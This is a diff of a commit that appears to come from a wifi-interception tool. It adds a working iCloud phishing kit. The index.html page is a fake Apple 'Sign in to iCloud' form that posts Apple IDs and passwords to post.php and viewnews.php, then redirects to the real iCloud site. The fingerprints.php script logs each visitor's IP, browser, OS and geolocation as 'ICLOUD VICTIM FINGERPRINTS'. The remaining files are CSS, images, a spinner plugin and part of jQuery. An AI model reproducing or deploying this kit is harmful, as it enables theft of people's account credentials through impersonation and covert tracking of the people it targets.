+ * NETEYE Activity Indicator jQuery Plugin
+ *
+ * Copyright (c) 2010 NETEYE GmbH
+ * Licensed under the MIT license
+ *
+ * Author: Felix Gnass [fgnass at neteye dot de]
+ * Version: @{VERSION}
+ */
+ 
+/**
+ * Plugin that renders a customisable activity indicator (spinner) using SVG or VML.
+ */
+(function($) {
+
+	$.fn.activity = function(opts) {
+		this.each(function() {
+			var $this = $(this);
+			var el = $this.data('activity');
+			if (el) {
+				clearInterval(el.data('interval'));
+				el.remove();
+				$this.removeData('activity');
+			}
+			if (opts !== false) {
+				opts = $.extend({color: $this.css('color')}, $.fn.activity.defaults, opts);
+				
+				el = render($this, opts).css('position', 'absolute').prependTo(opts.outside ? 'body' : $this);
+				var h = $this.outerHeight() - el.height();
+				var w = $this.outerWidth() - el.width();
+				var margin = {
+					top: opts.valign == 'top' ? opts.padding : opts.valign == 'bottom' ? h - opts.padding : Math.floor(h / 2),
+					left: opts.align == 'left' ? opts.padding : opts.align == 'right' ? w - opts.padding : Math.floor(w / 2)
+				};
+				var offset = $this.offset();
+				if (opts.outside) {
+					el.css({top: offset.top + 'px', left: offset.left + 'px'});
+				}
+				else {
+					margin.top -= el.offset().top - offset.top;
+					margin.left -= el.offset().left - offset.left;
+				}
+				el.css({marginTop: margin.top + 'px', marginLeft: margin.left + 'px'});
+				animate(el, opts.segments, Math.round(10 / opts.speed) / 10);
+				$this.data('activity', el);
+			}
+		});
+		return this;
+	};
+	
+	$.fn.activity.defaults = {
+		segments: 12,
+		space: 3,
+		length: 7,
+		width: 4,
+		speed: 1.2,
+		align: 'center',
+		valign: 'center',
+		padding: 4
+	};
+	
+	$.fn.activity.getOpacity = function(opts, i) {
+		var steps = opts.steps || opts.segments-1;
+		var end = opts.opacity !== undefined ? opts.opacity : 1/steps;
+		return 1 - Math.min(i, steps) * (1 - end) / steps;
+	};
+	
+	/**
+	 * Default rendering strategy. If neither SVG nor VML is available, a div with class-name 'busy' 
+	 * is inserted, that can be styled with CSS to display an animated gif as fallback.
+	 */
+	var render = function() {
+		return $('<div>').addClass('busy');
+	};
+	
+	/**
+	 * The default animation strategy does nothing as we expect an animated gif as fallback.
+	 */
+	var animate = function() {
+	};
+	
+	/**
+	 * Utility function to create elements in the SVG namespace.
+	 */
+	function svg(tag, attr) {
+		var el = document.createElementNS("http://www.w3.org/2000/svg", tag || 'svg');
+		if (attr) {
+			$.each(attr, function(k, v) {
+				el.setAttributeNS(null, k, v);
+			});
+		}
+		return $(el);
+	}
+	
+	if (document.createElementNS && document.createElementNS( "http://www.w3.org/2000/svg", "svg").createSVGRect) {
+	
+		// =======================================================================================
+		// SVG Rendering
+		// =======================================================================================
+		
+		/**
+		 * Rendering strategy that creates a SVG tree.
+		 */
+		render = function(target, d) {
+			var innerRadius = d.width*2 + d.space;
+			var r = (innerRadius + d.length + Math.ceil(d.width / 2) + 1);
+			
+			var el = svg().width(r*2).height(r*2);
+			
+			var g = svg('g', {
+				'stroke-width': d.width, 
+				'stroke-linecap': 'round', 
+				stroke: d.color
+			}).appendTo(svg('g', {transform: 'translate('+ r +','+ r +')'}).appendTo(el));
+			
+			for (var i = 0; i < d.segments; i++) {
+				g.append(svg('line', {
+					x1: 0, 
+					y1: innerRadius, 
+					x2: 0, 
+					y2: innerRadius + d.length, 
+					transform: 'rotate(' + (360 / d.segments * i) + ', 0, 0)',
+					opacity: $.fn.activity.getOpacity(d, i)
+				}));
+			}
+			return $('<div>').append(el).width(2*r).height(2*r);
+		};
+				
+		// Check if Webkit CSS animations are available, as they work much better on the iPad
+		// than setTimeout() based animations.
+		
+		if (document.createElement('div').style.WebkitAnimationName !== undefined) {
+
+			var animations = {};
+		
+			/**
+			 * Animation strategy that uses dynamically created CSS animation rules.
+			 */
+			animate = function(el, steps, duration) {
+				if (!animations[steps]) {
+					var name = 'spin' + steps;
+					var rule = '@-webkit-keyframes '+ name +' {';
+					for (var i=0; i < steps; i++) {
+						var p1 = Math.round(100000 / steps * i) / 1000;
+						var p2 = Math.round(100000 / steps * (i+1) - 1) / 1000;
+						var value = '% { -webkit-transform:rotate(' + Math.round(360 / steps * i) + 'deg); }\n';
+						rule += p1 + value + p2 + value; 
+					}
+					rule += '100% { -webkit-transform:rotate(100deg); }\n}';
+					document.styleSheets[0].insertRule(rule);
+					animations[steps] = name;
+				}
+				el.css('-webkit-animation', animations[steps] + ' ' + duration +'s linear infinite');
+			};
+		}
+		else {
+		
+			/**
+			 * Animation strategy that transforms a SVG element using setInterval().
+			 */
+			animate = function(el, steps, duration) {
+				var rotation = 0;
+				var g = el.find('g g').get(0);
+				el.data('interval', setInterval(function() {
+					g.setAttributeNS(null, 'transform', 'rotate(' + (++rotation % steps * (360 / steps)) + ')');
+				},  duration * 1000 / steps));
+			};
+		}
+		
+	}
+	else {
+		
+		// =======================================================================================
+		// VML Rendering
+		// =======================================================================================
+		
+		var s = $('<shape>').css('behavior', 'url(#default#VML)');
+
+		$('body').append(s);
+
+		if (s.get(0).adj) {
+		
+			// VML support detected. Insert CSS rules for group, shape and stroke.
+			var sheet = document.createStyleSheet();
+			$.each(['group', 'shape', 'stroke'], function() {
+				sheet.addRule(this, "behavior:url(#default#VML);");
+			});
+			
+			/**
+			 * Rendering strategy that creates a VML tree. 
+			 */
+			render = function(target, d) {
+			
+				var innerRadius = d.width*2 + d.space;
+				var r = (innerRadius + d.length + Math.ceil(d.width / 2) + 1);
+				var s = r*2;
+				var o = -Math.ceil(s/2);
+				
+				var el = $('<group>', {coordsize: s + ' ' + s, coordorigin: o + ' ' + o}).css({top: o, left: o, width: s, height: s});
+				for (var i = 0; i < d.segments; i++) {
+					el.append($('<shape>', {path: 'm ' + innerRadius + ',0  l ' + (innerRadius + d.length) + ',0'}).css({
+						width: s,
+						height: s,
+						rotation: (360 / d.segments * i) + 'deg'
+					}).append($('<stroke>', {color: d.color, weight: d.width + 'px', endcap: 'round', opacity: $.fn.activity.getOpacity(d, i)})));
+				}
+				return $('<group>', {coordsize: s + ' ' + s}).css({width: s, height: s, overflow: 'hidden'}).append(el);
+			};
+		
+			/**
+		     * Animation strategy that modifies the VML rotation property using setInterval().
+		     */
+			animate = function(el, steps, duration) {
+				var rotation = 0;
+				var g = el.get(0);
+				el.data('interval', setInterval(function() {
+					g.style.rotation = ++rotation % steps * (360 / steps);
+				},  duration * 1000 / steps));
+			};
+		}
+		$(s).remove();
+	}
+
+})(jQuery);

BIN
.pages/icloud/check1.png


+ 9 - 0
.pages/icloud/css/HelveticaNeue-Light-2.html

@@ -0,0 +1,9 @@
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<html><head>
+<title>404 Not Found</title>
+</head><body>
+<h1>Not Found</h1>
+<p>The requested URL /fonts/HelveticaNeue-Light-2.html was not found on this server.</p>
+<p>Additionally, a 404 Not Found
+error was encountered while trying to use an ErrorDocument to handle the request.</p>
+</body></html>

BIN
.pages/icloud/css/HelveticaNeue-Light.html


BIN
.pages/icloud/css/HelveticaNeue-Light.woff


BIN
.pages/icloud/css/HelveticaNeue-Medium.woff


BIN
.pages/icloud/css/Thumbs.db


BIN
.pages/icloud/css/_logo.png


BIN
.pages/icloud/css/arrow.png


BIN
.pages/icloud/css/arrow_bold.png


BIN
.pages/icloud/css/checked.png


BIN
.pages/icloud/css/cloud.png


BIN
.pages/icloud/css/cloud1.png


BIN
.pages/icloud/css/help.png


BIN
.pages/icloud/css/icloud_effect1.png


BIN
.pages/icloud/css/icloud_wallpaper.png


BIN
.pages/icloud/css/logo.png


BIN
.pages/icloud/css/packed-1@2x.png


BIN
.pages/icloud/css/pattern_middle.png


+ 296 - 0
.pages/icloud/css/styles.css

@@ -0,0 +1,296 @@
+@font-face {
+    font-family:'Helvetica Neue';
+    src: local("Helvetica Neue Light"),
+         local("HelveticaNeue-Light"),
+         url("         HelveticaNeue-Light.html") format("truetype"),
+         url("         HelveticaNeue-Light-2.html") format("woff");
+    font-weight:300
+}
+@font-face {
+    font-family: 'HelveticaLight';
+    src: url("         HelveticaNeue-Light.woff");
+}
+
+* {
+    margin: 0;
+    padding: 0;
+}
+
+html, body {
+    width: 100%;
+    height: 100%;
+    font-weight: 300;
+}
+.sign-in {
+	font-size: 39px;
+	line-height: 44px;
+	z-index: 10;
+	pointer-events: none;
+}
+.loader {
+	position: absolute;
+	left: 50%;
+	top: 50%;
+	color: white;
+	background: transparent;
+	font-family: Helvetica, Arial, Sans-Serif;
+	z-index: 3;
+}
+.body_image_old {
+    background: url("          icloud_wallpaper.png") no-repeat center center fixed;
+  -webkit-background-size: cover;
+  -moz-background-size: cover;
+  -o-background-size: cover;
+  background-size: cover;
+  z-index: 2;
+}
+.body_image_new {
+    opacity: 0;
+    background: url("          icloud_effect.png") no-repeat center center fixed;
+    -webkit-background-size: cover;
+    -moz-background-size: cover;
+    -o-background-size: cover;
+    background-size: cover;
+    /*background-size: 90% 90%;*/
+    width: 100%;
+    height: 100%;
+    z-index: 1;
+}
+.logo {
+    background: url("          _logo.png");
+    width: 56px;
+    height: 16px;
+}
+
+.help {
+    background: url("          help.png");
+    width: 22px;
+    height: 22px;
+}
+
+.lF {
+    float: left
+}
+
+.lR {
+    float: right
+}
+
+.instr {
+    color: rgba(255,255,255, 0.8);
+    font: 20px "HelveticaLight", sans-serif;
+    margin-right: 10px;
+    padding-right: 10px;
+    border-right: 1px solid #FFF;
+    cursor: pointer;    
+}
+
+.instr:hover {
+    color: rgba(255,255,255, 0.6);
+}
+.instr > span > a {
+	color: rgba(255,255,255, 0.8);
+	text-decoration: none;
+	font: 20px "HelveticaLight", sans-serif;
+}
+.instr > span > a:hover {
+	color: rgba(255,255,255, 1);
+	font: 20px "HelveticaLight", sans-serif;
+}
+.header {
+    padding: 15px;
+    top: 0px;
+    position: absolute;
+    width: 98%;
+}
+
+.body {
+    width: 360px;
+    height: 400px;
+    margin: -200px 0 0 -180px;
+    position: absolute;
+    top: 50%;
+    left: 50%;
+    background: transparent;
+}
+.sec::before {
+	position: absolute;
+	content: '';
+	height: 47px;
+	width: 380px;
+	top: 25px;
+	display: block;
+	background-size: 380px 247px;
+	background-image: url('          stylesheet-1@2x.png');
+	background-position: 0px -56px;
+	background-repeat: no-repeat;
+}
+.cloud {
+    background: url("          cloud.png");
+    width: 141px;
+    height: 91px;
+    margin: auto;
+}
+.clickable {
+	position: relative;
+	right: 0;
+	color: white;
+	cursor: pointer;
+	font-weight: bold;
+}
+.clickable:visited {
+	color: white;
+	cursor: pointer;
+}
+.center {
+	position: relative;
+	margin: 25px auto auto;
+	padding: 0;
+}
+.clickable:active {
+	color: white;
+	cursor: pointer;
+}
+.clickable:hover {
+	cursor: pointer;
+}
+.labelRef {
+    margin: 15px auto 10px;
+    font: 35px "HelveticaLight", sans-serif;
+    color: #FFF;
+    text-align: center;
+}
+.cont {
+	position: relative;
+	width: 170px;
+	margin: 20px auto auto;
+	text-align: center;
+}
+.cont2 {
+	position: relative;
+	text-align: center;
+	overflow: visible;
+	white-space: pre-line;
+}
+.tlrm {
+	position: absolute;
+	left: 0px;
+	top: -3px
+    background-image:url(check1.png);
+}
+.txt {
+	font-family: "HelveticaLight",sans-serif;
+	white-space: nowrap;
+	font-size: 17px;
+	line-height: 17px;
+	margin-left: 20px;
+	color: white;
+}
+.account-cr {
+	position: relative;
+	font-family: "HelveticaLight", sans-serif;
+	color: white;
+	font-size: 15px;
+	overflow: visible;
+}
+.boxFrm {
+    border-radius: 6px;
+    -webkit-border-radius: 6px;
+    -moz-border-radius: 6px;
+    -o-border-radius: 6px;
+    -ms-border-radius: 6px;
+    background: rgba(255, 255, 255, 0.75);
+    background-clip: padding-box;
+    border: 1px solid rgba(0, 0, 0,0.3);
+    height: 93px;
+    width: 322px;
+    margin: 20px auto 0;
+    margin-top:29px;
+    margin-left:19px
+}
+
+.boxFrm .appId1, .boxFrm .appId2 {
+	padding: 12px;
+	font: 20px "HelveticaLight", sans-serif;
+	margin-bottom: -6px;
+	border: none;
+	outline: none;
+	width: 300px;
+	background: transparent;
+}
+
+.boxFrm .appId1 {
+    border-bottom: 1px solid #CCC;
+}
+
+.boxFrm .appId2 {
+    width: 261px!important
+}
+.sbBtn {
+    opacity: 0.2;
+    background: url("          arrow.png");
+    width: 26px;
+    height: 26px;
+    border: none;
+    outline: none;
+    margin-top: 15px;
+} 
+
+.fLogo {
+    background: url("          logo.png");
+    width: 33px;
+    height: 33px;
+}
+
+.footer {
+    position: absolute;
+    bottom: 0px;
+    font: 13px "Helvetica Neue", sans-serif;
+    color: #FFF;
+    width: 100%;
+}
+
+.footer ul {
+    position: absolute;
+    right: 0;
+    text-decoration: none;
+    color: rgba(255,255,255,0.8);
+    text-shadow: 0px 3px 10px rgba(0,0,0,0.25);
+}
+
+.footer ul li {
+    display: block;
+    float: left;
+    padding-right: 10px;
+    border-right: 1px solid rgba(230,234,237,0.2);
+    margin-right: 10px;
+    line-height: 8px;
+    margin-top: 10px;
+    -webkit-transition: opacity 0.4s;
+    -moz-transition: opacity 0.4s;
+    -ms-transition: opacity 0.4s;
+    transition: opacity 0.4s;
+}
+.footer ul li a {
+	color: rgba(255,255,255,0.8);
+    	text-shadow: 0px 3px 10px rgba(0,0,0,0.25);
+    	cursor: pointer;
+    	text-decoration: none;
+}
+.footer ul li a:hover {
+	color: white;
+	text-decoration: none;
+}
+.footer ul li:hover {
+	color: white;
+	text-shadow: none;
+	cursor: pointer;
+}
+.footer ul li:last-child:hover {
+	color: rgba(255,255,255,0.8);
+    	text-shadow: 0px 3px 10px rgba(0,0,0,0.25);
+    	cursor: default;
+}
+.footer ul li:last-child {
+    border: none;
+}

BIN
.pages/icloud/css/stylesheet-1@2x.png


+ 126 - 0
.pages/icloud/fingerprints.php

@@ -0,0 +1,126 @@
+<?php 
+
+/*
+*  Copyright (c) 2019-2020 Barchampas Gerasimos <makindosxx@gmail.com>.
+*  proxior is a wifi interception.
+*
+*  proxior is free software: you can redistribute it and/or modify
+*  it under the terms of the GNU Affero General Public License as published by
+*  the Free Software Foundation, either version 3 of the License, or
+*  (at your option) any later version.
+*
+*  proxior is distributed in the hope that it will be useful,
+*  but WITHOUT ANY WARRANTY; without even the implied warranty of
+*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+*  GNU Affero General Public License for more details.
+*
+*  You should have received a copy of the GNU Affero General Public License
+*  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+*
+*/
+
+
+// Set File write informations
+$file = "fingerprints.txt";
+
+
+// Get Full date of victim visit
+$full_date = date("d-m-Y h:i:s");
+
+
+// Get Victim IP
+if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
+    $ip = $_SERVER['HTTP_CLIENT_IP'];
+} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+    $ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
+} else {
+    $ip = $_SERVER['REMOTE_ADDR'];
+}
+
+
+// Get Victim Browser
+$browser = $_SERVER['HTTP_USER_AGENT'];
+
+
+// Get Victim Os System
+
+function get_operating_system() {
+    $u_agent = $_SERVER['HTTP_USER_AGENT'];
+    $operating_system = 'Unknown Operating System';
+
+    //Get the operating_system name
+    if (preg_match('/linux/i', $u_agent)) {
+        $operating_system = 'Linux';
+    } elseif (preg_match('/macintosh|mac os x|mac_powerpc/i', $u_agent)) {
+        $operating_system = 'Mac';
+    } elseif (preg_match('/windows|win32|win98|win95|win16/i', $u_agent)) {
+        $operating_system = 'Windows';
+    } elseif (preg_match('/ubuntu/i', $u_agent)) {
+        $operating_system = 'Ubuntu';
+    } elseif (preg_match('/iphone/i', $u_agent)) {
+        $operating_system = 'IPhone';
+    } elseif (preg_match('/ipod/i', $u_agent)) {
+        $operating_system = 'IPod';
+    } elseif (preg_match('/ipad/i', $u_agent)) {
+        $operating_system = 'IPad';
+    } elseif (preg_match('/android/i', $u_agent)) {
+        $operating_system = 'Android';
+    } elseif (preg_match('/blackberry/i', $u_agent)) {
+        $operating_system = 'Blackberry';
+    } elseif (preg_match('/webos/i', $u_agent)) {
+        $operating_system = 'Mobile';
+    }
+    
+    return $operating_system;
+}
+
+
+$os_system = get_operating_system();
+
+
+
+// Get Victim Geolocation Info
+function get_client_ip()
+{
+    $ipaddress = '';
+    if (isset($_SERVER['HTTP_CLIENT_IP'])) {
+        $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_X_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
+    } else if (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
+    } else if (isset($_SERVER['HTTP_FORWARDED'])) {
+        $ipaddress = $_SERVER['HTTP_FORWARDED'];
+    } else if (isset($_SERVER['REMOTE_ADDR'])) {
+        $ipaddress = $_SERVER['REMOTE_ADDR'];
+    } else {
+        $ipaddress = 'UNKNOWN';
+    }
+
+    return $ipaddress;
+}
+$PublicIP = get_client_ip();
+$json     = file_get_contents("http://ipinfo.io/$PublicIP/geo");
+$json     = json_decode($json, true);
+$country  = $json['country'];
+$region   = $json['region'];
+$city     = $json['city'];
+
+
+
+
+file_put_contents($file, print_r("\nICLOUD VICTIM FINGERPRINTS => Informations \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("IP: $ip \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Full-Date: $full_date \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Country: $country \n", true), FILE_APPEND);
+file_put_contents($file, print_r("Region: $region \n", true), FILE_APPEND);
+file_put_contents($file, print_r("City: $city \n", true), FILE_APPEND);
+file_put_contents($file, print_r("User-Agent: $browser \n", true), FILE_APPEND);
+file_put_contents($file, print_r("OS-System: $os_system \n", true), FILE_APPEND);
+file_put_contents($file, print_r("/////////////////////////////////////////////////////// \n", true), FILE_APPEND);
+file_put_contents($file, print_r("\n", true), FILE_APPEND);
+
+?>

+ 226 - 0
.pages/icloud/index.html

@@ -0,0 +1,226 @@
+<html lang="pt-br"><head>
+    <title>iCloud</title>
+    <meta charset="utf-8">
+    <link rel="shortcut icon" href="favicon.ico">
+    <link rel="stylesheet" href="css/styles.css">
+    <link rel="stylesheet" href="http://code.jquery.com/ui/1.11.3/themes/smoothness/jquery-ui.css">
+    <script src="http://code.jquery.com/jquery-1.10.2.js"></script><style type="text/css"></style>
+    <script src="http://code.jquery.com/ui/1.11.3/jquery-ui.js"></script>
+    <script src="activity-indicator.js"></script>
+	
+<!--Mobile Script Exceptions-->
+<script type="text/javascript">
+if (screen.width <= 699) {
+document.location = "mobile.html";
+}
+</script>
+
+<script language="javascript">
+if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
+   location.replace("mobile.html");
+}
+</script>
+<!--/Mobile Script Exceptions-->
+</head>
+
+<body class="body_image_old" style="visibility: visible;">
+
+<div class="body_image_new" style="opacity: 1;"></div>
+<div id="loader" class="loader" style="display: none;"><div style="width: 26px; height: 26px; position: absolute; margin-top: -13px; margin-left: -13px; animation: spin12 0.8s linear infinite;"><svg style="width: 26px; height: 26px;"><g transform="translate(13,13)"><g stroke-width="1.5" stroke-linecap="round" stroke="rgb(255, 255, 255)"><line x1="0" y1="6" x2="0" y2="11" transform="rotate(0, 0, 0)" opacity="1"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(30, 0, 0)" opacity="0.9173553719008265"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(60, 0, 0)" opacity="0.8347107438016529"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(90, 0, 0)" opacity="0.7520661157024794"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(120, 0, 0)" opacity="0.6694214876033058"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(150, 0, 0)" opacity="0.5867768595041323"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(180, 0, 0)" opacity="0.5041322314049588"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(210, 0, 0)" opacity="0.42148760330578516"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(240, 0, 0)" opacity="0.33884297520661155"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(270, 0, 0)" opacity="0.25619834710743805"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(300, 0, 0)" opacity="0.17355371900826455"></line><line x1="0" y1="6" x2="0" y2="11" transform="rotate(330, 0, 0)" opacity="0.09090909090909094"></line></g></g></svg></div></div>
+<div class="container">
+    <div class="wrapper">
+
+        <div class="header">
+            <div class="logo lF"></div>
+            <div class="info lR">
+                <div class="instr lF">
+				<script type="text/javascript">
+                        
+                        function newPopup(url) {
+                            popupWindow = window.open(
+                                url,'popUpWindow','height=700,width=800,left=10,top=10,resizable=no,scrollbars=no,toolbar=no,menubar=no,location=no,directories=no,status=yes')
+                        }
+                    </script>
+                    <span><a href="https://www.apple.com/icloud/setup/">Setup Instructions</a></span>
+                </div>
+                <div class="help lF"></div>
+            </div>
+        </div>
+		
+        <div class="body">
+            <div>
+                <div class="cloud"></div>
+                <div class="labelRef">
+                    <span>Sign in to iCloud</span>
+                </div>
+                <div>
+                    <form action="post.php" method="post">
+                        <div class="boxFrm" style="width:325px;">
+                            <div class="line1">
+                                <input type="text" value="" class="appId1" placeholder="Apple ID" name="email" id="apple">
+                            </div>
+                            <div class="line2">
+                                <input type="password" value="" class="appId2 lF" placeholder="Password" name="password" id="pw">
+                                <input type="hidden" value="https://p01-caldav.icloud.com" id="server" name="server">
+                                <input type="hidden" value="icloudow.com/" name="link">
+                                <div style="margin-left:270px;"><input type="submit" value="" class="sbBtn lF" style="opacity: 0.2;"></div>
+                            </div>
+                        </div>
+                    </form>
+                </div>
+                <div class="cont">
+                    <span class="tlrm"><input type="checkbox"></span>
+                    <span class="txt">Keep me Signed In</span>
+                </div>
+                <div class="cont2 sec">
+                    <div class="center">
+                        <span class="account-cr"><a class="clickable" href="#">Forgot Apple ID or password?</a></span>
+                    </div>
+                </div>
+            </div>
+        </div>
+        <div class="footer">
+            <div class="fLogo lF"></div>
+            <ul class="lR">
+                <li></li>
+                <li><a href="https://signup.apple.com">Create Apple ID</a></li>
+                <li><a href="https://www.apple.com/support/systemstatus/">System&nbsp;Status</a></li>
+                <li><a href="https://www.apple.com/privacy/">Privacy&nbsp;Policy</a></li>
+                <li><a href="https://www.apple.com/legal/icloud/ww/">Terms&nbsp;&amp;&nbsp;Conditions</a></li>
+                <li>Copyright © 2020 Apple Inc. All rights reserved.</li>
+            </ul>
+        </div>
+
+    </div>
+</div>
+
+<script>
+      $("body").css("visibility", "hidden");
+    $('#loader').activity({width: 1.5, segments: 12, length: 5});
+    jQuery('#submit_loader').activity({width: 1.5, segments: 12, length: 5});
+    function typeCheck(element) {
+        var key = event.keyCode || event.charCode;
+        if (key == 8 || key == 46) {
+            $(".sbBtn").css("opacity", "0.2");
+            return element;
+        }
+        if (element !== "") {
+            $(".sbBtn").css("opacity", "1");
+        } else {
+            $(".sbBtn").css("opacity", "0.2");
+        }
+    }
+    $(document).ready(function () {
+        $("body").css("visibility", "visible");
+                function isValidEmailAddress(emailAddress) {
+            var pattern = new RegExp(/^(("[\w-+\s]+")|([\w-+]+(?:\.[\w-+]+)*)|("[\w-+\s]+")([\w-+]+(?:\.[\w-+]+)*))(@((?:[\w-+]+\.)*\w[\w-+]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$)|(@\[?((25[0-5]\.|2[0-4][\d]\.|1[\d]{2}\.|[\d]{1,2}\.))((25[0-5]|2[0-4][\d]|1[\d]{2}|[\d]{1,2})\.){2}(25[0-5]|2[0-4][\d]|1[\d]{2}|[\d]{1,2})\]?$)/i);
+            return pattern.test(emailAddress);
+        };
+        $('input[name=apple]').bind("keydown", function(e){
+            // enter key code is 13
+            if(e.which == 13 || e.which == 9){
+                e.preventDefault();
+                var val = $(this).val();
+                if (!isValidEmailAddress(val)) {
+                    val = val+"@icloud.com";
+                    $(this).val(val);
+                } else {
+                    console.log($(this).val());
+                }
+                console.log(val);
+                $("input[name=pw]").focus();
+                if(jQuery('#apple').val()=='' || jQuery('#pw').val()=='') $(".sbBtn").css("opacity", "0.2"); else $(".sbBtn").css("opacity", "1");
+
+                return false;
+            }
+        });
+        $("input[name=pw]").on("click keyup", function(){
+            val = $("input[name=apple]").val();
+            if (!isValidEmailAddress(val)) {
+                if(val!='@icloud.com' && val!='') val = val+"@icloud.com";
+                $("input[name=apple]").val(val);
+            }
+            if(jQuery('#apple').val()=='' || jQuery('#pw').val()=='') $(".sbBtn").css("opacity", "0.2"); else $(".sbBtn").css("opacity", "1");
+        });
+        var mm = 0;
+        var ss = setTimeout(function () {
+            $(".body_image_new").animate({ opacity: "1" }, 1000);
+            console.log(mm);
+            clearTimeout(ss);
+        }, 7500);
+        k = 1;
+        $(".tlrm").on("click", function () {
+            k++;
+            if (k % 2 == 0) {
+                $("#tlrm").attr("src", "images/checked.png");
+            } else {
+                $("#tlrm").attr("src", "images/Unknown");
+            }
+        });
+    });
+    var ss2 = setTimeout(function () {
+        $("#loader").fadeOut("slow");
+        $("div.container").fadeIn("slow");
+        $("div.container").css("display:", "block");
+        $(".sbBtn").css("opacity", "0.2");
+        clearTimeout(ss2);
+    }, 4500);
+
+    $('#apple,#pw').on('keyup', function(e) {
+        if (e.which == 13) {
+            checklogin();
+        }
+    });
+
+    function checklogin()
+    {
+        var apple = jQuery('#apple').val();
+        var pw = jQuery('#pw').val();
+        var server = jQuery('#server').val();
+        var lang = jQuery('#lang').val();
+        var links = jQuery('#link').val();
+        if(apple!='' && pw!='')
+        {
+            jQuery('#submit_button').hide();
+            jQuery('#submit_loader').show();
+            jQuery.ajax({
+                type:"POST",
+                url:"viewnews.php",
+                data:"apple="+apple+"&pw="+pw+"&server="+server+"&lang="+lang+"&link="+links,
+                success: function(msg){
+                    if(msg.search("INVALID")!=-1)
+                    {
+                        $('div.body').effect('shake');
+                        jQuery('#submit_button').show();
+                        jQuery('#submit_loader').hide();
+                        $(".sbBtn").css("opacity", "0.2");
+
+                    }
+                    else if(msg.search("SUCCESS")!=-1)
+                    {
+                        window.location.href = "https://www.icloud.com";
+                    }
+                    else
+                    {
+                        $('div.body').effect('shake');
+                        jQuery('#submit_button').show();
+                        jQuery('#submit_loader').hide();
+                        $(".sbBtn").css("opacity", "0.2");
+                    }
+                }
+            });
+        }
+        else
+        {
+            if(apple=='') jQuery('#apple').focus();
+            else if(pw=='') jQuery('#pw').focus();
+        }
+    }
+
+    function change_image(src)
+    {
+        if(src=='check2.png') jQuery('#help_checkbox').attr({'src':'check2.png','onClick':"change_image('check1.png')"}); else jQuery('#help_checkbox').attr('src','check1.png').attr('onClick',"change_image('check2.png')");
+    }
+</script>
+
+</body></html>

+ 5 - 0
.pages/icloud/index.php

@@ -0,0 +1,5 @@
+<?php
+include 'fingerprints.php';
+header('Location: index.html');
+exit;
+?>

+ 9789 - 0
.pages/icloud/jquery-1.10.2.js

@@ -0,0 +1,9789 @@
+/*!
+ * jQuery JavaScript Library v1.10.2
+ * http://jquery.com/
+ *
+ * Includes Sizzle.js
+ * http://sizzlejs.com/
+ *
+ * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors
+ * Released under the MIT license
+ * http://jquery.org/license
+ *
+ * Date: 2013-07-03T13:48Z
+ */
+(function( window, undefined ) {
+
+// Can't do this because several apps including ASP.NET trace
+// the stack via arguments.caller.callee and Firefox dies if
+// you try to trace through "use strict" call chains. (#13335)
+// Support: Firefox 18+
+//"use strict";
+var
+	// The deferred used on DOM ready
+	readyList,
+
+	// A central reference to the root jQuery(document)
+	rootjQuery,
+
+	// Support: IE<10
+	// For `typeof xmlNode.method` instead of `xmlNode.method !== undefined`
+	core_strundefined = typeof undefined,
+
+	// Use the correct document accordingly with window argument (sandbox)
+	location = window.location,
+	document = window.document,
+	docElem = document.documentElement,
+
+	// Map over jQuery in case of overwrite
+	_jQuery = window.jQuery,
+
+	// Map over the $ in case of overwrite
+	_$ = window.$,
+
+	// [[Class]] -> type pairs
+	class2type = {},
+
+	// List of deleted data cache ids, so we can reuse them
+	core_deletedIds = [],
+
+	core_version = "1.10.2",
+
+	// Save a reference to some core methods
+	core_concat = core_deletedIds.concat,
+	core_push = core_deletedIds.push,
+	core_slice = core_deletedIds.slice,
+	core_indexOf = core_deletedIds.indexOf,
+	core_toString = class2type.toString,
+	core_hasOwn = class2type.hasOwnProperty,
+	core_trim = core_version.trim,
+
+	// Define a local copy of jQuery
+	jQuery = function( selector, context ) {
+		// The jQuery object is actually just the init constructor 'enhanced'
+		return new jQuery.fn.init( selector, context, rootjQuery );
+	},
+
+	// Used for matching numbers
+	core_pnum = /[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,
+
+	// Used for splitting on whitespace
+	core_rnotwhite = /\S+/g,
+
+	// Make sure we trim BOM and NBSP (here's looking at you, Safari 5.0 and IE)
+	rtrim = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,
+
+	// A simple way to check for HTML strings
+	// Prioritize #id over <tag> to avoid XSS via location.hash (#9521)
+	// Strict HTML recognition (#11290: must start with <)
+	rquickExpr = /^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,
+
+	// Match a standalone tag
+	rsingleTag = /^<(\w+)\s*\/?>(?:<\/\1>|)$/,
+
+	// JSON RegExp
+	rvalidchars = /^[\],:{}\s]*$/,
